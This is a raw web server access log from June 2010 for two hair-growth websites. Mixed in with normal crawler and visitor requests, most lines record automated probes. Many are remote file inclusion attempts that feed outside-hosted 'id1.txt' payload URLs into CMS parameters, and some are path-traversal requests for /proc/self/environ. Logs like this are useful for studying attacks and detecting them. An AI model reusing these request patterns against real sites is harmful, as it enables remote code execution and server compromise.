62.80.164.185 - - [06/Jun/2010:17:01:26 -0700] "GET /logs/access_100322.log/skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.55.146.140 - - [06/Jun/2010:17:03:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bluenilehost.com/pmachine/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.55.146.140 - - [06/Jun/2010:17:03:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bluenilehost.com/pmachine/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.55.146.140 - - [06/Jun/2010:17:03:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bluenilehost.com/pmachine/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.80.164.185 - - [06/Jun/2010:17:05:34 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.80.164.185 - - [06/Jun/2010:17:05:34 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.80.164.185 - - [06/Jun/2010:17:05:34 -0700] "GET /logs/access.log/skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.80.164.185 - - [06/Jun/2010:17:09:03 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.80.164.185 - - [06/Jun/2010:17:09:03 -0700] "GET /logs/access.log%20%20/skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.80.164.185 - - [06/Jun/2010:17:09:03 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.pdd.co.kr/bbs/script/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.37.176 - - [06/Jun/2010:17:16:41 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [06/Jun/2010:17:16:42 -0700] "GET /logs/access_100104.log HTTP/1.0" 200 553567 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:17:20:12 -0700] "GET /logs/access_100125.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef%20/board.php?board=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:17:20:12 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef%20/board.php?board=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:17:20:12 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef%20/board.php?board=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
109.111.184.1 - - [06/Jun/2010:17:40:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.freehairsecrets.com"
109.111.184.1 - - [06/Jun/2010:17:40:29 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.freehairsecrets.com"
207.46.204.185 - - [06/Jun/2010:17:45:07 -0700] "GET /SecretsforFasterHairGrowth3.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:51:14 -0700] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:51:16 -0700] "GET /logs/access_100125.log///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:51:18 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:52:49 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:52:53 -0700] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:52:56 -0700] "GET /logs/access_100125.log///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:53:13 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:53:13 -0700] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:53:13 -0700] "GET /logs/access_100125.log///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.135.228.230 - - [06/Jun/2010:17:54:24 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
200.135.228.230 - - [06/Jun/2010:17:54:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
200.135.228.230 - - [06/Jun/2010:17:55:19 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
200.135.228.230 - - [06/Jun/2010:17:55:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
208.115.111.248 - - [06/Jun/2010:17:56:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
66.249.65.238 - - [06/Jun/2010:17:57:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:57:30 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:57:34 -0700] "GET /logs/access_100125.log///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:17:57:34 -0700] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:18:06:20 -0700] "GET /logs/access_100125.log%20%20///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:18:06:23 -0700] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:18:06:23 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:18:08:35 -0700] "GET /logs/access_100125.log%20%20///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:18:08:37 -0700] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [06/Jun/2010:18:08:40 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.95.58.209 - - [06/Jun/2010:18:18:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
212.95.58.209 - - [06/Jun/2010:18:18:29 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:19:36 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:19:36 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:19:36 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:21:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10582 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1186 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:22:16 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12545 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12736 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12812 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14990 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15259 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2179 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:18:22:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=675 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
85.114.130.150 - - [06/Jun/2010:18:27:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://cisco-gbics-glc-sx-mm.in" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.freehairsecrets.com"
85.114.130.150 - - [06/Jun/2010:18:27:57 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:34:01 -0700] "GET /logs/access_091221.log///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:34:01 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:34:01 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 5806 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:35:06 -0700] "GET /logs/access_091221.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:35:21 -0700] "GET /logs/access_091123.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:36:26 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 5806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:36:26 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:36:26 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.114.238 - - [06/Jun/2010:18:41:20 -0700] "GET /logs/?N=D HTTP/1.0" 200 5784 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:45:48 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:45:49 -0700] "GET /logs/access_091026.log///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:45:49 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 5806 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:47:47 -0700] "GET /logs/access_091012.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:47:49 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:47:49 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:47:49 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 5806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:48:01 -0700] "GET /logs/access_091102.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [06/Jun/2010:18:51:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.80.193.29 - - [06/Jun/2010:18:53:38 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; YPC 3.2.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; IEMB3)" "www.growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:55:46 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:55:46 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 5806 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:55:47 -0700] "GET /logs/access_100125.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:55:48 -0700] "GET /logs/access_100208.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:18:57:05 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:57:06 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 5806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:18:57:06 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.7.108.203 - - [06/Jun/2010:18:59:13 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
82.99.38.11 - - [06/Jun/2010:19:00:46 -0700] "GET /logs/access_100308.log/index.php?option=com_migrator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
82.99.38.11 - - [06/Jun/2010:19:00:46 -0700] "GET /index.php?option=com_migrator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
82.99.38.11 - - [06/Jun/2010:19:00:47 -0700] "GET /logs/index.php?option=com_migrator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
82.99.38.11 - - [06/Jun/2010:19:03:26 -0700] "GET /logs/access_100301.log/index.php?option=com_migrator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
121.88.4.141 - - [06/Jun/2010:19:06:44 -0700] "GET /logs/scripts.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [06/Jun/2010:19:06:45 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [06/Jun/2010:19:06:45 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:19:08:18 -0700] "GET /logs/access_100222.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
190.152.145.54 - - [06/Jun/2010:19:14:48 -0700] "GET /logs/access_100412.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:19:14:48 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:19:14:48 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 200 5805 "-" "Mozilla/5.0" "growlonghairfast.com"
207.7.108.203 - - [06/Jun/2010:19:24:03 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
207.7.108.203 - - [06/Jun/2010:19:24:03 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
207.7.108.203 - - [06/Jun/2010:19:24:03 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
207.7.108.203 - - [06/Jun/2010:19:33:08 -0700] "GET /logs/access_100510.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:34:40 -0700] "GET /logs/access_100322.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:34:40 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:34:40 -0700] "GET /logs/access_100322.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:34:40 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:34:40 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:34:40 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.10.135.205 - - [06/Jun/2010:19:37:55 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.10.135.205 - - [06/Jun/2010:19:37:55 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.10.135.205 - - [06/Jun/2010:19:37:55 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
